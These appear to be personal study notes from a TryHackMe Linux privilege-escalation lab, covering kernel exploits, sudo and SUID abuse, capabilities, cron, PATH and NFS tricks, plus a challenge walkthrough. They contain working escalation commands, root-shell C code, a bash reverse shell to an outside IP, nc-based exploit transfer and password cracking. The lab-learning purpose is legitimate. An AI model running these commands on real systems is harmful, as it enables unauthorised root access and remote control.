linux privilege

# linux privilege ###### tags: `tryhackme` `privilege` [TOC] # Kernel Privilege Target INFO systems info ![](https://i.imgur.com/VWc2aQo.png) --- ![](https://i.imgur.com/IYqaMYR.png) our machine ``` nc -lvnp 443 -k < ovf.c ``` Victim ``` cd /var/tmp nc 10.17.11.72 443 > ovf.c gcc ovf.c -o ovf ./ovf whoami find / -name flag.txt cat flag.txt ``` # Sudo Leverage Application https://gtfobins.github.io/ ![](https://i.imgur.com/jI0uazy.png) --- It can be used to break out from restricted environments by spawning an interactive system shell. ![](https://i.imgur.com/O3xozrS.png) --- ![](https://i.imgur.com/IasVMzm.png) # SUID Problem ![](https://i.imgur.com/fwtFhUn.png) ## Permission Bypass ![](https://i.imgur.com/ZtnXJUd.png) ![](https://i.imgur.com/jHqju4b.png) Find the special privilege of configuration file. (SUID) "s" ``` find / -type f -perm -04000 -ls 2>/dev/null ``` ![](https://i.imgur.com/y0yjQVZ.png) ![](https://i.imgur.com/yCFcl6o.png) ![](https://i.imgur.com/PUxY6qE.png) ![](https://i.imgur.com/5luF28i.png) ![](https://i.imgur.com/NjAZjz7.png) --- ![](https://i.imgur.com/FYz5Bgm.png) ![](https://i.imgur.com/28raCSr.png) ## Capability ![](https://i.imgur.com/e0vJFte.png) ### find ``` getcap -r / 2>/dev/null ``` ![](https://i.imgur.com/3Y3CJ4C.png) ``` :py3 import os os.setuid(0) os.execl("/bin/sh", "sh", "-c", "reset; exec sh") #執行 "/bin/sh" 這個程式，並傳入 "sh" 和 "-c" 參數，以及字串 "reset; exec sh"。 ``` uid 0 -> root execute /bin/sh command: sh -c reset // reset the terminal sh -c exec sh //open new shell ![](https://i.imgur.com/W4IUyXL.png) --- ``` ./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' ``` ![](https://i.imgur.com/2ovKYt8.png) --- ## Cron ``` cat /etc/crontab ``` ![](https://i.imgur.com/Ha8jdYS.png) ![](https://i.imgur.com/0EUgEP6.png) ``` vim backup.sh chomd -x backup.sh ``` bash shell ``` bash -l >& /dev/tcp/10.10.10.10/6666 0>&1 ``` ![](https://i.imgur.com/Lhp1bag.png) ![](https://i.imgur.com/oJI6Wip.png) --- ![](https://i.imgur.com/acT5aPI.png) --- ![](https://i.imgur.com/CaN0zps.png) ![](https://i.imgur.com/aNdYPb6.png) ![](https://i.imgur.com/oTVGOyO.png) ## $PATH ### $PATH writable ![](https://i.imgur.com/cI4I7tg.png) root file ``` #include<unistd.h> void main(){ setuid(0); setgid(0); system("thm"); } ``` ``` cd /tmp echo "/bin/bash" > thm ./rootfile ``` ![](https://i.imgur.com/lj9aW3T.png) ## NFS (Network File Share) vulnerability options -> "no_root_squash" Display the target share file path ``` showmount --export 10.0.0.12 ``` Show the NFS server's export list. Using the share file directory ``` mount -o rw 10.0.0.12:/tmp /ourmachine/directory ``` -o optionslist ```c #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main (void){ setuid(0); setgid(0); system("bin/bash"); return 0; } ``` ``` gcc code.c -o code -w chmod +s code //set Suid ``` --- ## Challenge [leonard@ip-10-10-42-180 ~]$ uname -a Linux ip-10-10-42-180 3.10.0-1160.el7.x86_64 //kernel version #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux ### Gathing the systems information ![](https://i.imgur.com/b0Y6G9R.png) Testing kernel ![](https://i.imgur.com/Yp9iCPV.png) no vulnerability --- ![](https://i.imgur.com/5j2pbe8.png) ### Sudo ![](https://i.imgur.com/RPSB7IU.png) NO sudo privilege ### SUID ![](https://i.imgur.com/pJ18Rhr.png) ![](https://i.imgur.com/zfD4rrv.png) Using john to crack the root password ![](https://i.imgur.com/HCKEWO3.png) ![](https://i.imgur.com/f3bEqFR.png) Burp the password failed. ### Corntab ![](https://i.imgur.com/tDV8tQy.png) ### Target ![](https://i.imgur.com/NjLNkjG.png) We could try to find user Missy and Rootflag. ![](https://i.imgur.com/W2SD8IF.png) Not Missy and Rootflag users ![](https://i.imgur.com/ttvyCV5.png) Missy password -> Password1 ## Sudo -l (missy) ![](https://i.imgur.com/dQT66N6.png) we could use find commend to privilege escalation ``` sudo find . -exec /bin/sh \; -quit ``` ![](https://i.imgur.com/BEhVfGM.png) flag 1 ![](https://i.imgur.com/WdIhxEe.png) flag 2 ![](https://i.imgur.com/LjdWUhv.png)